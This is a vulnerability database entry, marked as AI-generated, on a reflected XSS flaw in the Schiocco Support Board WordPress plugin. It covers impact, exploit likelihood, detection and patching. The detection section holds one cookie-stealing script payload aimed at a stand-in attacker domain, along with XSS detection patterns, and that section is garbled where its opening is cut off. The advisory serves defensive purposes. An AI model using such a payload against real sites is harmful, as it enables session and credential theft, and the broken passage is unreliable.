
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-60182 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Schiocco Support Board WordPress plugin, classified under CWE-79. It affects all versions of the plugin prior to 3.8.7 and was reported by researcher Trương Hữu Phúc (truonghuuphuc) on July 1, 2025, with public disclosure on July 31, 2025. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).
The vulnerability stems from improper neutralization of user-supplied input during web page generation (CWE-79), allowing malicious scripts to be reflected back to users without adequate sanitization or encoding. As a Reflected XSS, the attack is delivered via a crafted URL or link that, when clicked by a victim, causes the plugin to echo unsanitized input directly into the HTML response. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a privileged user must click a malicious link or visit a crafted page. The vulnerability is classified under OWASP Top 10 A3: Injection (Patchstack).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, redirection to malicious sites, or defacement of web content visible to the victim. The changed scope in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting other application components or users (Patchstack).
No public proof-of-concept exploit code or in-the-wild exploitation has been confirmed at this time. The EPSS score is approximately 0.029% (0.000290), indicating a low current probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of their size or popularity (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).%3Cscript%3E, javascript:, onerror=, onload=) in query parameters; outbound connections from victim browsers to unknown external domains shortly after visiting the site.The vendor Schiocco has released version 3.8.7 of the Support Board plugin, which patches this vulnerability. All users should update to version 3.8.7 or later immediately via the WordPress plugin dashboard. As an interim measure, Patchstack has issued a virtual patching/mitigation rule for its users to block exploitation attempts until the plugin is updated. If updating is not immediately possible, consider temporarily deactivating the plugin or restricting access to affected pages (Patchstack).
The vulnerability was discovered and reported through Patchstack's Vulnerability Disclosure Program (VDP) by researcher Trương Hữu Phúc (truonghuuphuc), who submitted the report on July 1, 2025. Patchstack classified it as medium priority and noted that XSS vulnerabilities of this type are frequently leveraged in mass WordPress exploitation campaigns. No significant broader media coverage or notable social media discussion has been identified beyond the Patchstack advisory (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."